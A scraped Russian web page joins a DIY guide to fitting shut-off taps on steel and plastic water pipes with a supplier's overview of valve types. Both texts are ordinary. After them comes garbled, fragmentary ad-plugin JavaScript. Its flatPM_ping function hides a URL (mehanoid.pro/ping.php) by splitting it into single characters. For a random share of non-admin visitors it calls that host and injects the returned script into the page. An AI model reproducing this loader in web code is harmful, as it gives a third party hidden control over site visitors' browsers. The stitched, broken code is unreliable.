Монтаж запорной арматуры вполне можно выполнить самостоятельно. Эта работа вполне по силам даже начинающему домашнему мастеру.

Необходимые инструменты, оборудование и материалы

Для монтажа кранов и задвижек  в стальной водопровод необходимы: кран, два разводных ключа (возможно, один разводной и один газовый) и лента ФУМ. Для монтажа узла ввода необходима накидная гайка (так называемая «американка») с прокладками.

Для пайки пластика —  кран, переходная муфта, ножницы для резки пластиковых труб (или угловая шлифмашинка с диском), сварочное устройство для пластиковых труб.

Монтаж запорной арматуры трубопроводов

Не забывайте перед началом работ отключить воду!

Монтаж  крана на резьбовое соединение:

  • при установке необходимо соблюдать направление движения жидкости – оно указано стрелкой на корпусе;
  • вкрутить гайку-«американку» в кран со стороны выхода жидкости;
  • накрутить кран на резьбу, перед этим очистить резьбу от ржавчины и грязи;
  • накинуть накидную гайку «американки» на продолжение трубы и закрутить.

Накидная гайка герметизируется прокладками, стык крана и резьбы – лентой ФУМ.

Пайка пластиковых изделий:

  • выставить температуру сварочного устройства с помощью терморегулятора — 260°С для полипропилена и 220°С для полиэтилена, прогреть прибор в течение 10-20 минут (пока погаснет индикатор);
  • трубу и раструб крана установить в насадку и прогреть в течение 7 секунд (для труб 20-25 мм);
  • соединить разогретые элементы (не более, чем за 8 секунд), прижать, выдержать не менее 2 минут;
  • проверить качество сварного соединения – оно будет выглядеть в виде небольшого валика на стыке трубы и крана;
  • дать остыть соединению, не смещать его, не перекручивать;
  • повторить все операции с другой стороны крана.

Видео по монтажу

Зрение информативнее любых слов ­ — в нашем видео Вы можете увидеть весь процесс пайки пластикового крана воочию и прикручивания обычного крана на резьбу.

Советы специалистов

  • Следует иметь в виду, что на ввод нельзя ставить пластик – в случае выхода из строя его долго менять. Чугун и сталь ржавеют – от этих материалов стоит отказаться.
  • Монтаж каких-либо элементов газопровода своими руками запрещен – и лучше не экспериментировать в целях безопасности.
  • Для медных систем водоснабжения применяют медные фитинги. Пайка медных трубопроводов и фитингов сложна – лучше доверить ее специалисту.
  • Не следует использовать при монтаже паклю – современная лента ФУМ надежнее изолирует стыки и позволяет в случае поломки легко раскрутить резьбовое соединение.
  • При необходимости сварить металлопластиковую трубу необходимо удалить два верхних слоя полипропилена и алюминиевой фольги (для этого существует специальный аппарат – шейвер). Нельзя сваривать пластик при отрицательных температурах.
  • Если происходит замена изделия  на резьбовом соединении и оно не откручивается, стоит применить специальный состав для смазки резьбы (например, WD-40).
  • При установке крана направление тока жидкости должно совпадать со стрелкой на кране.

Заключение

Дорогой читатель! Мы надеемся, что наша статья послужит для Вас источником полезных знаний и поможет смонтировать в доме системы отопления и водоснабжения.

Подпишитесь на нашу рассылку – и все тонкости работы домашнего мастера будут Вам известны из наших статей! Приглашайте друзей читать наш сайт, делитесь с ними информацией на такие нужные темы о ремонте и строительстве своего дома.

(Пока оценок нет)
Загрузка…

Источник: https://vseotrube.ru/ventili-i-zadvizhki/zapornaya-armatura

Виды запорной арматуры — Альянс-М

Задачу осуществления перекрытия потоков рабочих сред выполняет трубопроводная запорная арматура.

Несмотря на то, что ее основная цель – это обеспечивать всего два состояния управления потоками: «открыто/закрыто», ее применение значительно шире.

Так, запорная арматура используется в трубопроводных системах, где необходимо проводить небольшие по времени спуски для оценки параметров рабочей среды.

ООО «Альянс М» предоставляет выбор всех известных вариантов запорной арматуры для трубопроводов, применяемых в различных сферах промышленного и хозяйственного обеспечения.
Представленная продукция отвечает стандартам качества и не имеет ограничений для применения в заданной сфере.

Совет

К материалам, используемым при изготовлении данных установок, относятся различные сплавы (сталь, чугун), цветные металлы (бронза), никель и титан. Они применяются для создания корпуса устройства. В качестве уплотнителей используют кожу, резину (для небольших диаметров запорной арматуры, выбор их для больших диаметров невозможен).

Прокладочные материалы чаще всего представлены изделиями из резины: упругие, но непрочные, из асбеста – для высоких температур, из металла – для обеспечения максимальной герметичности. Еще один немаловажный элемент – материалы, отвечающие за обеспечение герметизации. Графит, тальк, стекловолокно и др. используются для создания сальниковой набивки.

Базовые виды запорной арматуры

К базовым видам запорной арматуры относят краны, вентили, заслонки и задвижки. Каждый из названных типов получил свое распространение в различных модификациях.

Краны – трубопроводная запорная арматура, обладающая небольшими размерами, осуществляющая управление потоками посредством поворота затвора. К разновидностям кранов относят пробковые/шаровые, а также муфтовые/фланцевые.

К плюсам кранов относятся:

  • малые размеры (габариты);
  • простота в конструкции;
  • легкость в эксплуатации;
  • возможность использования для управления проблемными (например, сильно загрязненными) средами.

Недостатки кранов:

  • требуется тщательное техническое обслуживание (прежде всего, в зависимости от модели), нуждаются в своевременном уходе, смазке отдельных элементов;
  • износ частей протекает в разные временные периоды, что отрицательно сказывается на уровне герметичности.

Клапаны/вентили – тип запорной трубопроводной арматуры, представленный в виде устройства, выполняющего запирающее движение параллельно потоку рабочей среды. Задача его аналогична другим устройствам: осуществление перекрытия.

Название «вентили» является несколько устаревшим, ранее оно было применимо только к клапанам, управление которых приводилось в движение резьбовым штоком. Сейчас же, определение «клапан» применимо и к устройствам, обладающим гладким штоком.

Клапаны являются широко применимым видом запорной арматуры. Отчасти их популярность объяснима простотой конфигурации вкупе с высокой степенью обеспечения герметичности.

Они могут быть использованы как для жидких, так и для газообразных состояний. Монтируются преимущественно на трубопроводах, характеризующихся небольшими диаметрами.

В противном варианте возникает необходимость прибегать к формированию громоздких конструкций, что требует большого объема затрат.

Как и остальные типы запорной арматуры, клапаны наделены рядом плюсов и минусов. К положительным сторонам клапанов можно отнести:

  • высокую прочность, что делает возможным использование в условиях агрессивной среды;
  • простота конструкции обеспечивает быстроту ремонта;
  • малый процент износа при активной эксплуатации.

Отрицательными факторами в использовании клапанов будут являться:

  • большие объемы расхода энергии, обусловленные высоким сопротивлением;
  • склонность к коррозии из-за наличия в корпусе проблемных зон, где нередко происходит застой примесей частей рабочей среды.

Заслонки – запорная арматура, основной элемент которой обладает формой вращающегося диска. Наиболее широко монтируются на трубопроводах, отличающихся большим диаметром.

Заслонки не обеспечивают высокой герметичности, поэтому чаще всего не могут быть применимы к другим моделям арматур. Иногда вместо термина «заслонки» употребляется определение «затворы».

В данном контексте понятия являются синонимичными.

Плюсы заслонок:

  • легкость в управлении;
  • простое устройство: в случае необходимости, замена запорной арматуры легко осуществима;
  • относительно небольшие габариты (длина/масса);
  • низкая стоимость.

К минусам заслонок относят:

  • обеспечивают невысокую герметичность (как было упомянуто выше);
  • при использовании заслонок на трубопроводах с большим диаметром требуется возведении дополнительных конструкций, в частности, редуктора;
  • провоцируют возникновение сложностей в очистке трубопроводных систем.

Задвижки – запорная арматура, характеризующаяся небольшой длиной, основной элемент которой совершает движение перпендикулярно потоку. Чтобы открыть/закрыть проход, осуществляется поворотное движение шпинделя. В связи с этим, задвижки, обладающие большим проходным диаметром, оснащаются электрическими приводами.

Сферой применения задвижек являются трубопроводы, являющиеся объектами ЖКХ, газового снабжения, водопроводы.

Так же, как и краны, задвижки являются широко распространенным типом трубопроводной запорной арматуры. Названный факт объясняется положительными свойствами задвижек, к которым относят:

  • небольшая длина;
  • простое устройство;
  • универсальность применения в самых разных условиях;
  • возможность использования для сетей, характеризующихся высокими скоростями движения рабочей среды.

Отчасти универсальность использования объясняется небольшими гидравлическими потерями, неизбежными в процессе использования.

Отрицательные свойства задвижек:

  • высота, показатели которой являются достаточно высокими;
  • управление ими требует гораздо больших временных затрат;
  • при износе каких-либо частей, ремонт в процессе использования осуществить сложно.

Устройство запорной арматуры

Конструкция всех представленных видов трубопроводной запорной арматуры обладает схожими признаками. На основе этого можно сформировать классическую модель.

В качестве базовой модели устройство запорной арматуры представлено как единство корпусной части и непосредственно запорного узла, который крепится к ней. Узел герметично делит трубопровод на составные части.

В свою очередь, он представлен седлом и запорным органом.

Рассмотрим типовое устройство запорной арматуры, каждый из типов которой, был рассмотрен ранее.

Краны представляют собой сочетание корпуса и затвора, обладающего шарообразной/цилиндрической формой.

Обратите внимание

Во втором проделывается отверстие, которое предназначено для осуществления выпуска рабочей среды. Его поворот при этом и будет обеспечивать процесс управления в зависимости от его углов.

Так, при определенном положении можно обеспечить полное либо частичное перекрытие потока.

В некоторых формах кранов устройство затвора позволяет осуществлять перенаправление рабочих сред: для этого в нем проделываются дополнительные отверстия.

Устройство клапанов/вентилей объединяет корпус, с расположенным внутри него седлом. Благодаря двум патрубкам корпус присоединяется к трубопроводу.

При перекрытии проходного сечения седло закрывается затвором. Шпиндель осуществляет передачу вращательного действия, приводящегося вручную либо автоматически, золотнику.

Далее золотник, приняв на себя направление движения, опускается в седло, обеспечивая перекрытие.

Запорная арматура, представленная заслонками, имеет металлическую оболочку, внутри которой располагается поворотная часть. Чаще всего она напоминает диск, который способен осуществлять вращение вокруг оси. Так как рабочая среда протекает через саму оболочку, поворот диска, прижимающегося к частям корпуса, будет обеспечивать перекрытие потока.

Устройство задвижек в типовой форме образует сочетание корпуса и его крышки. Внутри — протекают рабочие потоки.

Там же располагается и затвор, а также парные седла, расположенных либо параллельно, либо под углом. Задвижка крепится к трубопроводу благодаря двум концам. Затвор располагается перпендикулярно оси рабочей среды.

Важно

Сдвиг его в нужное положение обеспечивается за счет вращения шпинделя либо гайки. Шпиндель, в свою очередь, соединяется с затвором и с управляющей частью, запускающей в ход задвижку.

Данное типовая схема применима для задвижек, управляемых как вручную, так и автоматически.

Запорно-регулирующая арматура

Запорно-регулирующая арматура (ЗРА) является комбинированным видом запорной и регулирующей арматуры, способной выполнять основные функции двух данных типов (отключение, распределение, сброс). Основной задачей данного вида арматуры является управление потоком рабочей среды путем полного либо частичного перекрытия диаметра проходного сечения.

Запорно-регулирующая арматура осуществляет управление параметрами давления, температуры и количества рабочего вещества, готовящегося к подаче.

В зависимости от сферы применения выделяют следующую классификацию:

  • промышленная;
  • специальная;
  • санитарно-техническая.

Применение ЗРА свойственно всем основным сферам хозяйственной жизни. Как правило, она обладает общими характеристиками и потому выпускается массово.

Промышленная трубопроводная арматура активно вводится в эксплуатацию в водопроводных и газопроводных системах, в тепловых сетях. Водозапорная арматура является довольной прочной, устойчивой к перепаду температур, способной выдержать большое количество различных механических воздействий.

Применение запорной арматуры для газа обусловлено необходимостью проведения плановых и внеплановых отключений приборов газопровода, а регулирующей – для управления давлением. Запорную арматуру тепловых сетей монтируют для обеспечения спуска/выпуска воды и воздуха, для разделения трубопроводов на отдельные секции.

Поставки специальной запорно-регулирующей арматуры производится по спецзаказу в соответствии с указанными техническими требованиями, санитарно-техническая арматура обеспечивает управление рабочими средами бытовых объектов и производится в соответствии с типовыми указаниями.

Наша компания поможет определиться с выбором трубопроводной запорной арматуры в зависимости от стоящих задач и требуемых характеристик. Представленные устройства также позволяют осуществить замену запорной арматуры, вышедшей из строя.

Источник: http://m-alliance.ru/articles/vidy-zapornoj-armatury/

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};